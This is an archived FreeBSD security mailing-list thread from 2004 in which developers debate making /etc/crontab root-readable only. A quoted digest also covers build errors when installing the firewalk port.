from beastie.frontfree.net ([127.0.0.1]) by localhost (beastie.frontfree.net [127.0.0.1]) (amavisd-new, port 10024) with ESMTP id 01919-10; Wed, 11 Aug 2004 02:10:41 +0800 (CST) Received: by beastie.frontfree.net (Postfix, from userid 1001) id A5459119C2; Wed, 11 Aug 2004 02:10:39 +0800 (CST) Date: Wed, 11 Aug 2004 02:10:39 +0800 From: Xin LI To: Doug Barton Message-ID: <20040810181039.GA3189@frontfree.net> References: <20040810161305.GA161@frontfree.net> <20040810095953.H1984@qbhto.arg> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="BOKacYhQ+x31HxR3" Content-Disposition: inline In-Reply-To: <20040810095953.H1984@qbhto.arg> User-Agent: Mutt/1.4.2.1i X-GPG-key-ID/Fingerprint: 0xCAEEB8C0 / 43B8 B703 B8DD 0231 B333 DC28 39FB 93A0 CAEE B8C0 X-GPG-Public-Key: http://www.delphij.net/delphij.asc X-Operating-System: FreeBSD beastie.frontfree.net 5.2-delphij FreeBSD 5.2-delphij #3: Fri Jul 30 20:01:43 CST 2004 delphij@beastie.frontfree.net:/usr/obj/usr/src/sys/BEASTIE i386 X-URL: http://www.delphij.net X-By: delphij@beastie.frontfree.net X-Location: Beijing, China X-Virus-Scanned: by amavisd-new at frontfree.net cc: "freebsd-security@FreeBSD.org" Subject: Re: [PATCH] Tighten /etc/crontab permissions X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list List-Id: Security issues [members-only posting] List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 10 Aug 2004 18:10:49 -0000 --BOKacYhQ+x31HxR3 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable Hi, Doug On Tue, Aug 10, 2004 at 10:02:09AM -0700, Doug Barton wrote: >=20 > On Wed, 11 Aug 2004, Xin LI wrote: >=20 > >Hi folks, > > > >While investigating OpenBSD's cron implementation, I found that they set > >the systemwide crontab (a.k.a. /etc/crontab) to be readable by the > >superuser only. The attached patch will bring this to FreeBSD by moving > >crontab out from BIN1 group and install it along with master.passwd. >=20 > Do you have a reason for wanting to do this other than, "OpenBSD does it= =20 > this way?" I personally see no problems, and some benefit for users=20 > being able to see the system crontab. If the superuser needs to run=20 > "secret" cron jobs, then there is root's crontab that can be used for=20 > this purpose. >=20 > Can you elaborate on your thinking? Well... This seems much more than "OpenBSD does it" to me :-) On a system that all users plays good, it does not matter if other users can see the crontab. However, if it gets compromised, chances that a badly configured system, say, with some permissions badly granted, would give the intruder a better chance to get more privilege if [s]he can read the crontab, and I think this is one of the reasons why the per-user cronta= bs are kept in /var/cron and without granting users to see each others'. I'm not sure if this is a sort of abusing systemwide crontabs, but the administrators at my company have used them to run some tasks periodly under other identities (to limit these tasks' privilege), and it provided a somewhat "centralized" management so they would prefer to use systemwide crontab rather than per-user ones. What do you think about the benefit for users being able to see the system crontab? I think knowing what would be executed under others' identity is (at least) not always a good thing, especially the users we generally don't fully trust... Cheers, --=20 Xin LI http://www.delphij.net/ See complete headers for GPG key and other information. --BOKacYhQ+x31HxR3 Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.5 (FreeBSD) iD8DBQFBGQ+fOfuToMruuMARAtmyAJ4r2KexkN1yT//vP6rt1gcS4Q87FwCeMcI5 SABDh7+mgJn1GjKTBWLpz1g= =FQRX -----END PGP SIGNATURE----- --BOKacYhQ+x31HxR3-- From owner-freebsd-security@FreeBSD.ORG Tue Aug 10 19:01:33 2004 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id D400616A4CE; Tue, 10 Aug 2004 19:01:33 +0000 (GMT) Received: from smtp3.server.rpi.edu (smtp3.server.rpi.edu [128.113.2.3]) by mx1.FreeBSD.org (Postfix) with ESMTP id 2398943D39; Tue, 10 Aug 2004 19:01:33 +0000 (GMT) (envelope-from drosih@rpi.edu) Received: from [128.113.24.47] (gilead.netel.rpi.edu [128.113.24.47]) by smtp3.server.rpi.edu (8.13.0/8.13.0) with ESMTP id i7AJ1Vmo025789; Tue, 10 Aug 2004 15:01:32 -0400 Mime-Version: 1.0 X-Sender: drosih@mail.rpi.edu Message-Id: In-Reply-To: <20040810181039.GA3189@frontfree.net> References: <20040810161305.GA161@frontfree.net> <20040810095953.H1984@qbhto.arg> <20040810181039.GA3189@frontfree.net> Date: Tue, 10 Aug 2004 15:01:30 -0400 To: Xin LI , Doug Barton From: Garance A Drosihn Content-Type: text/plain; charset="us-ascii" ; format="flowed" X-Scanned-By: CanIt (www . canit . ca) cc: freebsd-security@freebsd.org Subject: Re: [PATCH] Tighten /etc/crontab permissions X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list List-Id: Security issues [members-only posting] List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 10 Aug 2004 19:01:34 -0000 At 2:10 AM +0800 8/11/04, Xin LI wrote: > >On Tue, Aug 10, 2004 at 10:02:09AM -0700, Doug Barton wrote: >> > > Can you elaborate on your thinking? > >I'm not sure if this is a sort of abusing systemwide crontabs, but >the administrators at my company have used them to run some tasks >periodicly under other identities (to limit these tasks' privilege), >and it provided a somewhat "centralized" management so they would >prefer to use systemwide crontab rather than per-user ones. You could get about the same effect by having them all under root's crontab, and then having the entry 'su' to the appropriate userid before running. So it is centralized in one crontab (root's), but it is protected from prying eyes. >What do you think about the benefit for users being able to see >the system crontab? I think knowing what would be executed under >others' identity is (at least) not always a good thing, especially >the users we generally don't fully trust... For generic system tasks, it can be useful to know when they run. Maybe this means more to me because I'm actually awake at all odd hours of the morning, so I notice the effects of some of those runs. My runs of 'cvsup_mirror', for instance. Basically, I use the system crontab for events where I think it is safe for every user to know when the events occur, and use other crontabs for the things I want to keep private. Just a personal preference thing, obviously. -- Garance Alistair Drosehn = gad@gilead.netel.rpi.edu Senior Systems Programmer or gad@freebsd.org Rensselaer Polytechnic Institute or drosih@rpi.edu From owner-freebsd-security@FreeBSD.ORG Tue Aug 10 19:40:28 2004 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 4031D16A4CE; Tue, 10 Aug 2004 19:40:28 +0000 (GMT) Received: from pd3mo2so.prod.shaw.ca (shawidc-mo1.cg.shawcable.net [24.71.223.10]) by mx1.FreeBSD.org (Postfix) with ESMTP id B9F4843D2D; Tue, 10 Aug 2004 19:40:27 +0000 (GMT) (envelope-from gbaratto@superb.net) Received: from pd4mr2so.prod.shaw.ca (pd4mr2so-qfe3.prod.shaw.ca [10.0.141.213]) by l-daemon (iPlanet Messaging Server 5.2 HotFix 1.18 (built Jul 28 2003)) with ESMTP id <0I2800JGQWZDTI@l-daemon>; Tue, 10 Aug 2004 13:33:13 -0600 (MDT) Received: from pn2ml6so.prod.shaw.ca ([10.0.121.150]) by pd4mr2so.prod.shaw.ca (Sun ONE Messaging Server 6.0 HotFix 1.01 (built Mar 15 2004)) with ESMTP id <0I28009DUWZCPY50@pd4mr2so.prod.shaw.ca>; Tue, 10 Aug 2004 13:33:12 -0600 (MDT) Received: from chivas (S01060080c8118809.vc.shawcable.net [24.85.89.252]) by l-daemon (iPlanet Messaging Server 5.2 HotFix 1.18 (built Jul 28 2003)) with SMTP id <0I2800D5FWZBED@l-daemon>; Tue, 10 Aug 2004 13:33:12 -0600 (MDT) Date: Tue, 10 Aug 2004 12:32:56 -0700 From: "Gustavo A. Baratto" To: Xin LI , Doug Barton , Garance A Drosihn Message-id: <002401c47f10$d6f98ea0$6400a8c0@chivas> MIME-version: 1.0 X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2800.1441 X-Mailer: Microsoft Outlook Express 6.00.2800.1437 Content-type: text/plain; charset=iso-8859-1 Content-transfer-encoding: 7bit X-Priority: 3 X-MSMail-priority: Normal References: <20040810161305.GA161@frontfree.net> <20040810095953.H1984@qbhto.arg> <20040810181039.GA3189@frontfree.net> cc: freebsd-security@freebsd.org Subject: Re: [PATCH] Tighten /etc/crontab permissions X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list List-Id: Security issues [members-only posting] List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 10 Aug 2004 19:40:28 -0000 It is better to have something secure by default. If someone wants to open up the crontab in /etc/crontab for other users to see it, he/she can do it on his/her own risk. Many ppl that are not very familiar with system administration nor security, but yet manage a server could add cronjobs that could be very harmful to themselves and they don't know (eg. mysqldump for backups with the password hardcoded in the command). Maybe, the purpose of /etc/crontab is exactly to be a read-by-all file. That's fine, but in this case, a security warning with BIG letters should be printed in the very beginning of the file. my $0.02 ;) ----- Original Message ----- From: "Garance A Drosihn" To: "Xin LI" ; "Doug Barton" Cc: Sent: Tuesday, August 10, 2004 12:01 PM Subject: Re: [PATCH] Tighten /etc/crontab permissions > At 2:10 AM +0800 8/11/04, Xin LI wrote: > > > >On Tue, Aug 10, 2004 at 10:02:09AM -0700, Doug Barton wrote: > >> > > > Can you elaborate on your thinking? > > > >I'm not sure if this is a sort of abusing systemwide crontabs, but > >the administrators at my company have used them to run some tasks > >periodicly under other identities (to limit these tasks' privilege), > >and it provided a somewhat "centralized" management so they would > >prefer to use systemwide crontab rather than per-user ones. > > You could get about the same effect by having them all under root's > crontab, and then having the entry 'su' to the appropriate userid > before running. So it is centralized in one crontab (root's), but > it is protected from prying eyes. > > >What do you think about the benefit for users being able to see > >the system crontab? I think knowing what would be executed under > >others' identity is (at least) not always a good thing, especially > >the users we generally don't fully trust... > > For generic system tasks, it can be useful to know when they run. > Maybe this means more to me because I'm actually awake at all odd > hours of the morning, so I notice the effects of some of those > runs. My runs of 'cvsup_mirror', for instance. > > Basically, I use the system crontab for events where I think it > is safe for every user to know when the events occur, and use > other crontabs for the things I want to keep private. Just a > personal preference thing, obviously. > > -- > Garance Alistair Drosehn = gad@gilead.netel.rpi.edu > Senior Systems Programmer or gad@freebsd.org > Rensselaer Polytechnic Institute or drosih@rpi.edu > _______________________________________________ > freebsd-security@freebsd.org mailing list > http://lists.freebsd.org/mailman/listinfo/freebsd-security > To unsubscribe, send any mail to "freebsd-security-unsubscribe@freebsd.org" > From owner-freebsd-security@FreeBSD.ORG Tue Aug 10 20:17:16 2004 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id A7B3716A4CE for ; Tue, 10 Aug 2004 20:17:16 +0000 (GMT) Received: from dfmm.org (walter.dfmm.org [66.180.195.210]) by mx1.FreeBSD.org (Postfix) with ESMTP id 8DE7B43D3F for ; Tue, 10 Aug 2004 20:17:16 +0000 (GMT) (envelope-from freebsd-security@dfmm.org) Received: (qmail 55608 invoked by uid 1000); 10 Aug 2004 20:17:16 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 10 Aug 2004 20:17:16 -0000 Date: Tue, 10 Aug 2004 13:17:14 -0700 (PDT) From: Jason Stone X-X-Sender: jason@walter To: "freebsd-security@FreeBSD.org" In-Reply-To: <20040810181039.GA3189@frontfree.net> Message-ID: <20040810130428.L19702@walter> References: <20040810161305.GA161@frontfree.net> <20040810095953.H1984@qbhto.arg> <20040810181039.GA3189@frontfree.net> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Subject: Re: [PATCH] Tighten /etc/crontab permissions X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list List-Id: Security issues [members-only posting] List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 10 Aug 2004 20:17:16 -0000 -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 > What do you think about the benefit for users being able to see the > system crontab? I think knowing what would be executed under others' > identity is (at least) not always a good thing, especially the users we > generally don't fully trust... so do you also suggest that we default to setting the sysctl variables that prevent users from seeing each others processes with ps(1)? because to me, if you want to be hard core, that seems like a much more obvious place to start - who cares that I can read crontab if I can run ps and see _all_ the other processes on the system, not just the ones in cron. the default install has to strike the right balance of security out of the box and usability out of the box, and it's sometimes unclear what are the right choices. but even if you want to err on the side of security, you still have to think about things logically, and think of what exactly you're protecting and from whom. if users shouldn't be able to see each others' processes, then you should address that from a more systemic level and not just try to tack on little security annoyances. if you want to say that users shouldn't be able to see each other, then think about all the ways that users can see each other - reading each others' files, seeing each others' process with ps or in /proc, seeing what network ports other users have bound with sockstat or lsof - then decide which are the important things to lock down, which ones are easy and which ones are not worth it, and come up with a more comprehensive approach. I wouldn't object to a general, high-level security option to prevent users from seeing each other, but only changing the permissions on crontab doesn't buy you any real security, it just creates annoyances. -Jason -------------------------------------------------------------------------- Freud himself was a bit of a cold fish, and one cannot avoid the suspicion that he was insufficiently fondled when he was an infant. -- Ashley Montagu -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.3 (FreeBSD) Comment: See https://private.idealab.com/public/jason/jason.gpg iD8DBQFBGS1MswXMWWtptckRAl9WAJ9Ta51dessY0ys9ResdCrQ0r5MdAgCfZKpM VXG3QzBfa5AxtoN4KybrbWs= =GmfW -----END PGP SIGNATURE----- From owner-freebsd-security@FreeBSD.ORG Tue Aug 10 20:21:09 2004 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 7E95C16A4CE; Tue, 10 Aug 2004 20:21:09 +0000 (GMT) Received: from a2.scoop.co.nz (aurora.scoop.co.nz [203.96.152.68]) by mx1.FreeBSD.org (Postfix) with ESMTP id 8E54443D2D; Tue, 10 Aug 2004 20:21:08 +0000 (GMT) (envelope-from andrew@scoop.co.nz) Received: from localhost (localhost [127.0.0.1]) by a2.scoop.co.nz (8.12.11/8.12.11) with ESMTP id i7AKL7ZT087189; Wed, 11 Aug 2004 08:21:07 +1200 (NZST) (envelope-from andrew@scoop.co.nz) Date: Wed, 11 Aug 2004 08:21:07 +1200 (NZST) From: Andrew McNaughton To: "Gustavo A. Baratto" In-Reply-To: <002401c47f10$d6f98ea0$6400a8c0@chivas> Message-ID: <20040811080257.Q1573@a2.scoop.co.nz> References: <20040810161305.GA161@frontfree.net> <20040810095953.H1984@qbhto.arg> <002401c47f10$d6f98ea0$6400a8c0@chivas> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII; format=flowed X-Greylist: Sender IP whitelisted, not delayed by milter-greylist-1.5.3 (a2.scoop.co.nz [127.0.0.1]); Wed, 11 Aug 2004 08:21:07 +1200 (NZST) X-Virus-Scanned: clamd / ClamAV version 0.74, clamav-milter version 0.74a on a2.scoop.co.nz X-Virus-Status: Clean cc: freebsd-security@freebsd.org cc: Garance A Drosihn Subject: Re: [PATCH] Tighten /etc/crontab permissions X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list List-Id: Security issues [members-only posting] List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 10 Aug 2004 20:21:09 -0000 Hiding the contents of /etc/crontab sounds to me like security through obscurity. There's very little depth to it, and it's more likely to give a false sense of security than anything real. Anyone hardcoding a mysql password in the command line is asking for trouble, regardless of whether /etc/crontab is readable. Once running, It's visible to anyone via tools like ps and procfs. Better to leave the neophyte administrator to figure out how not to put the password or anything else sensitive on the command line, rather than letting them believe that it's secure because the crontab file is not readable. Andrew McNaughton On Tue, 10 Aug 2004, Gustavo A. Baratto wrote: > It is better to have something secure by default. If someone wants to open > up the crontab in /etc/crontab for other users to see it, he/she can do it > on his/her own risk. > Many ppl that are not very familiar with system administration nor security, > but yet manage a server could add cronjobs that could be very harmful to > themselves and they don't know (eg. mysqldump for backups with the password > hardcoded in the command). > > Maybe, the purpose of /etc/crontab is exactly to be a read-by-all file. > That's fine, but in this case, a security warning with BIG letters should be > printed in the very beginning of the file. > > my $0.02 ;) > > > ----- Original Message ----- > From: "Garance A Drosihn" > To: "Xin LI" ; "Doug Barton" > Cc: > Sent: Tuesday, August 10, 2004 12:01 PM > Subject: Re: [PATCH] Tighten /etc/crontab permissions > > >> At 2:10 AM +0800 8/11/04, Xin LI wrote: >>> >>> On Tue, Aug 10, 2004 at 10:02:09AM -0700, Doug Barton wrote: >>>> >>> > Can you elaborate on your thinking? >>> >>> I'm not sure if this is a sort of abusing systemwide crontabs, but >>> the administrators at my company have used them to run some tasks >>> periodicly under other identities (to limit these tasks' privilege), >>> and it provided a somewhat "centralized" management so they would >>> prefer to use systemwide crontab rather than per-user ones. >> >> You could get about the same effect by having them all under root's >> crontab, and then having the entry 'su' to the appropriate userid >> before running. So it is centralized in one crontab (root's), but >> it is protected from prying eyes. >> >>> What do you think about the benefit for users being able to see >>> the system crontab? I think knowing what would be executed under >>> others' identity is (at least) not always a good thing, especially >>> the users we generally don't fully trust... >> >> For generic system tasks, it can be useful to know when they run. >> Maybe this means more to me because I'm actually awake at all odd >> hours of the morning, so I notice the effects of some of those >> runs. My runs of 'cvsup_mirror', for instance. >> >> Basically, I use the system crontab for events where I think it >> is safe for every user to know when the events occur, and use >> other crontabs for the things I want to keep private. Just a >> personal preference thing, obviously. >> >> -- >> Garance Alistair Drosehn = gad@gilead.netel.rpi.edu >> Senior Systems Programmer or gad@freebsd.org >> Rensselaer Polytechnic Institute or drosih@rpi.edu >> _______________________________________________ >> freebsd-security@freebsd.org mailing list >> http://lists.freebsd.org/mailman/listinfo/freebsd-security >> To unsubscribe, send any mail to > "freebsd-security-unsubscribe@freebsd.org" >> > > _______________________________________________ > freebsd-security@freebsd.org mailing list > http://lists.freebsd.org/mailman/listinfo/freebsd-security > To unsubscribe, send any mail to "freebsd-security-unsubscribe@freebsd.org" > -- No added Sugar. Not tested on animals. May contain traces of Nuts. If irritation occurs, discontinue use. ------------------------------------------------------------------- Andrew McNaughton Living in a shack in Tasmania andrew@scoop.co.nz Between the bush and the sea Mobile: +61 422 753 792 http://staff.scoop.co.nz/andrew/cv.doc http://www.scoop.co.nz/ From owner-freebsd-security@FreeBSD.ORG Tue Aug 10 20:34:04 2004 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 672EC16A4CE for ; Tue, 10 Aug 2004 20:34:04 +0000 (GMT) Received: from mxsf06.cluster1.charter.net (mxsf06.cluster1.charter.net [209.225.28.206]) by mx1.FreeBSD.org (Postfix) with ESMTP id EC81543D49 for ; Tue, 10 Aug 2004 20:34:03 +0000 (GMT) (envelope-from c0ldbyte@myrealbox.com) Received: from mxip20.cluster1.charter.net (mxip20a.cluster1.charter.net [209.225.28.150])i7AKY2oU014026 for ; Tue, 10 Aug 2004 16:34:02 -0400 Received: from 24.247.14.41.gha.mi.chartermi.net (HELO eleanor.spectical.net) (24.247.14.41) by mxip20.cluster1.charter.net with ESMTP; 10 Aug 2004 16:34:03 -0400 X-Ironport-AV: i="3.83,118,1089000000"; d="scan'208"; a="118975014:sNHT14816328" Date: Tue, 10 Aug 2004 16:34:02 -0400 (EDT) From: c0ldbyte To: freebsd-security@freebsd.org In-Reply-To: <20040810120129.6D66716A4CE@hub.freebsd.org> Message-ID: References: <20040810120129.6D66716A4CE@hub.freebsd.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Subject: Re: freebsd-security Digest, Vol 72, Issue 2 X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list List-Id: Security issues [members-only posting] List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 10 Aug 2004 20:34:04 -0000 ----------------------------------------------------------------- Doesnt all this belong somewhere else besides the security lists since this isnt a security issue. ----------------------------------------------------------------- On Tue, 10 Aug 2004 freebsd-security-request@freebsd.org wrote: > Send freebsd-security mailing list submissions to > freebsd-security@freebsd.org > > To subscribe or unsubscribe via the World Wide Web, visit > http://lists.freebsd.org/mailman/listinfo/freebsd-security > or, via email, send a message with subject or body 'help' to > freebsd-security-request@freebsd.org > > You can reach the person managing the list at > freebsd-security-owner@freebsd.org > > When replying, please edit your Subject line so it is more specific > than "Re: Contents of freebsd-security digest..." > > > Today's Topics: > > 1. firewalk (Kenzo) > 2. Re: firewalk (Fabio Miranda Hamburger) > 3. Re: firewalk (Kenzo) > 4. Re: firewalk (Kevin D. Kinsey, DaleCo, S.P.) > > > ---------------------------------------------------------------------- > > Message: 1 > Date: Mon, 9 Aug 2004 14:04:25 -0500 > From: "Kenzo" > Subject: firewalk > To: > Message-ID: > Content-Type: text/plain; charset="iso-8859-1" > > I was wondering if anyone got firewalk to install? > I'm running 4.10 stable and it doesn't seem to want to install. > It's looking for libnet 1.1 or higher I believe and the ports only comes > with version 1.0. > I manually downloaded the latest version and installed it. Still firewalk > doesn't know where to look for it. > any ideas?? > > Thanks. > > ------------------------------ > > Message: 2 > Date: Mon, 9 Aug 2004 12:33:38 -0600 (CST) > From: Fabio Miranda Hamburger > Subject: Re: firewalk > To: Kenzo > Cc: freebsd-security@freebsd.org > Message-ID: > Content-Type: TEXT/PLAIN; charset=US-ASCII > >> I was wondering if anyone got firewalk to install? >> I'm running 4.10 stable and it doesn't seem to want to install. >> It's looking for libnet 1.1 or higher I believe and the ports only comes >> with version 1.0. >> I manually downloaded the latest version and installed it. Still firewalk >> doesn't know where to look for it. > > > #cd /usr/ports/security/firewalk > #make install clean > > works fine. > > If no, try to cvsup latest -stable port collection. > > > ------------------------------ > > Message: 3 > Date: Mon, 9 Aug 2004 15:26:52 -0500 > From: "Kenzo" > Subject: Re: firewalk > Cc: > Message-ID: > Content-Type: text/plain; charset="iso-8859-1" > > This is what I get. > > alien# sudo make install clean > ===> Building for firewalk-5.0_1 > Making all in src > cc -DHAVE_CONFIG_H -I. -I. -I../include -I/usr/local/include -O -pipe -ma > rch= > pentiumpro -Wall -c init.c > In file included from /usr/local/include/libnet.h:62, > from ../include/firewalk.h:42, > from init.c:38: > /usr/include/netinet/ip_icmp.h:81: warning: `icmp_pptr' redefined > /usr/local/include/dnet/icmp.h:131: warning: this is the location of the > previou > s definition > /usr/include/netinet/ip_icmp.h:82: warning: `icmp_gwaddr' redefined > /usr/local/include/dnet/icmp.h:144: warning: this is the location of the > previou > s definition > /usr/include/netinet/ip_icmp.h:185: warning: `ICMP_INFOTYPE' redefined > /usr/local/include/dnet/icmp.h:104: warning: this is the location of the > previou > s definition > In file included from ../include/firewalk.h:42, > from init.c:38: > /usr/local/include/libnet.h:87: #error "byte order has not been specified, > you'l > l" > In file included from ../include/firewalk.h:42, > from init.c:38: > /usr/local/include/libnet.h:88: syntax error before string constant > *** Error code 1 > > Stop in /usr/ports/security/firewalk/work/Firewalk/src. > *** Error code 1 > > Stop in /usr/ports/security/firewalk/work/Firewalk. > *** Error code 1 > > Stop in /usr/ports/security/firewalk. > > I have no idea what this is. > > ----- Original Message ----- > From: "Fabio Miranda Hamburger" > To: "Kenzo" > Cc: > Sent: Monday, August 09, 2004 1:33 PM > Subject: Re: firewalk > > >>> I was wondering if anyone got firewalk to install? >>> I'm running 4.10 stable and it doesn't seem to want to install. >>> It's looking for libnet 1.1 or higher I believe and the ports only comes >>> with version 1.0. >>> I manually downloaded the latest version and installed it. Still > firewalk >>> doesn't know where to look for it. >> >> >> #cd /usr/ports/security/firewalk >> #make install clean >> >> works fine. >> >> If no, try to cvsup latest -stable port collection. >> >> > > ------------------------------ > > Message: 4 > Date: Mon, 09 Aug 2004 15:53:34 -0500 > From: "Kevin D. Kinsey, DaleCo, S.P." > Subject: Re: firewalk > To: Kenzo > Cc: freebsd-security@freebsd.org > Message-ID: <4117E44E.1010605@daleco.biz> > Content-Type: text/plain; charset=ISO-8859-1; format=flowed > > Kenzo wrote: > >> This is what I get. >> >> alien# sudo make install clean >> ===> Building for firewalk-5.0_1 >> Making all in src >> cc -DHAVE_CONFIG_H -I. -I. -I../include -I/usr/local/include -O -pipe -ma >> rch= >> pentiumpro -Wall -c init.c >> In file included from /usr/local/include/libnet.h:62, >> from ../include/firewalk.h:42, >> from init.c:38: >> /usr/include/netinet/ip_icmp.h:81: warning: `icmp_pptr' redefined >> /usr/local/include/dnet/icmp.h:131: warning: this is the location of the >> previou >> s definition >> /usr/include/netinet/ip_icmp.h:82: warning: `icmp_gwaddr' redefined >> /usr/local/include/dnet/icmp.h:144: warning: this is the location of the >> previou >> s definition >> /usr/include/netinet/ip_icmp.h:185: warning: `ICMP_INFOTYPE' redefined >> /usr/local/include/dnet/icmp.h:104: warning: this is the location of the >> previou >> s definition >> In file included from ../include/firewalk.h:42, >> from init.c:38: >> /usr/local/include/libnet.h:87: #error "byte order has not been specified, >> you'l >> l" >> In file included from ../include/firewalk.h:42, >> from init.c:38: >> /usr/local/include/libnet.h:88: syntax error before string constant >> *** Error code 1 >> >> Stop in /usr/ports/security/firewalk/work/Firewalk/src. >> *** Error code 1 >> >> Stop in /usr/ports/security/firewalk/work/Firewalk. >> *** Error code 1 >> >> Stop in /usr/ports/security/firewalk. >> >> I have no idea what this is. >> >> > > Looks like someone made a mistake in the libnet > port. You can check and see if they've fixed at > either via their website or by checking if a newer > version with a different checksum exists at > the ftp site. If your ports tree is out of date, it > would probably be best to cvsup it anyway... > > You might also be able to fix the error yourself --- > check line 87 - 88 of /usr/local/include/libnet.h. > > Quite possibly a commented line wrapped wrongly > in this case. > > HTH, > > Kevin Kinsey > > ------------------------------ > > _______________________________________________ > freebsd-security@freebsd.org mailing list > http://lists.freebsd.org/mailman/listinfo/freebsd-security > To unsubscribe, send any mail to "freebsd-security-unsubscribe@freebsd.org" > > End of freebsd-security Digest, Vol 72, Issue 2 > *********************************************** > From owner-freebsd-security@FreeBSD.ORG Wed Aug 11 20:56:28 2004 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id A71BF16A4CE for ; Wed, 11 Aug 2004 20:56:28 +0000 (GMT) Received: from drizzle.sasknow.net (drizzle.sasknow.net [204.83.220.141]) by mx1.FreeBSD.org (Postfix) with ESMTP id 4CD7B43D2D for ; Wed, 11 Aug 2004 20:56:28 +0000 (GMT) (envelope-from ryan@sasknow.com) Received: from mail.sasknow.com (mail.sasknow.com [207.195.92.135]) by drizzle.sasknow.net (8.12.9p2/8.12.9) with ESMTP id i7BKuP2v017798 for ; Wed, 11 Aug 2004 14:56:25 -0600 (CST) (envelope-from ryan@sasknow.com) Date: Wed, 11 Aug 2004 14:56:25 -0600 (CST) From: Ryan Thompson To: freebsd-security@freebsd.org In-Reply-To: <20040811111334.G44734@drizzle.sasknow.net> Message-ID: <20040811145610.K41454@drizzle.sasknow.net> References: <20040810161305.GA161@frontfree.net> <20040811111334.G44734@drizzle.sasknow.net> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-Spam-Virus-Status: Clean, ClamAV version devel-20040729, clamav-milter version 0.75b on drizzle.sasknow.net X-Spam-Status: No, hits=-19.538 required=7 tests=MSGID_PINE=-2.1,RT_SUBJ_RE7=-0.3,ALL_TRUSTED=-0.8,BAYES_00=-4.9,BAYES_LOW_AND_TZ_NEAR=-7.0,TIME_13_17_BAYES_LOW=-7.0,AWL=2.6 autolearn=no version=3.000000-pre3 Subject: Re: [PATCH] Tighten /etc/crontab permissions X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list List-Id: Security issues [members-only posting] List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 11 Aug 2004 20:56:28 -0000 Hi Xin, Personally, I'd be opposed to this idea, for a couple of reasons: 1. The impact is too narrow. There are many, many files in /etc/ (and elsewhere, for that matter) that are also currently set world- readable by default. Patching the perms of just one file creates inconsistency, and, without a more general policy on this sort of thing, we're likely to hear whining about "everything *else* is world-readable. What's so special about /etc/crontab?" 2. Even if there *is* some small security benefit to be gained through obscurity (see #3), it's probably outweighed by the convenience of the matter in this case, and that has some real security implications. We'd be asking admins to su everytime they want to look at /etc/crontab. For most of us, we consider our systems more secure the more we can do without a superuser shell. 3. You're not really gaining much by making /etc/crontab only readable by the superuser. It's currently trivial for regular users to view process information, and most cron jobs run on predictable boundaries (since per-minute timings are the most granular scheduling allowed). We don't want admins thinking, "nobody else can read this file, so anything I put in here must be top secret", because that's *not* the case. Just my CA$0.10. :-) - Ryan Xin LI wrote to freebsd-security@freebsd.org: > Hi folks, > > While investigating OpenBSD's cron implementation, I found that they set > the systemwide crontab (a.k.a. /etc/crontab) to be readable by the > superuser only. The attached patch will bring this to FreeBSD by moving > crontab out from BIN1 group and install it along with master.passwd. > > This change should not affect the current cron(1) behavior. > > Cheers, > -- > Xin LI http://www.delphij.net/ > See complete headers for GPG key and other information. > > -- Ryan Thompson SaskNow Technologies - http://www.sasknow.com 901-1st Avenue North - Saskatoon, SK - S7K 1Y4 Tel: 306-664-3600 Fax: 306-244-7037 Saskatoon Toll-Free: 877-727-5669 (877-SASKNOW) North America From owner-freebsd-security@FreeBSD.ORG Wed Aug 11 21:07:15 2004 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 67BED16A4CE for 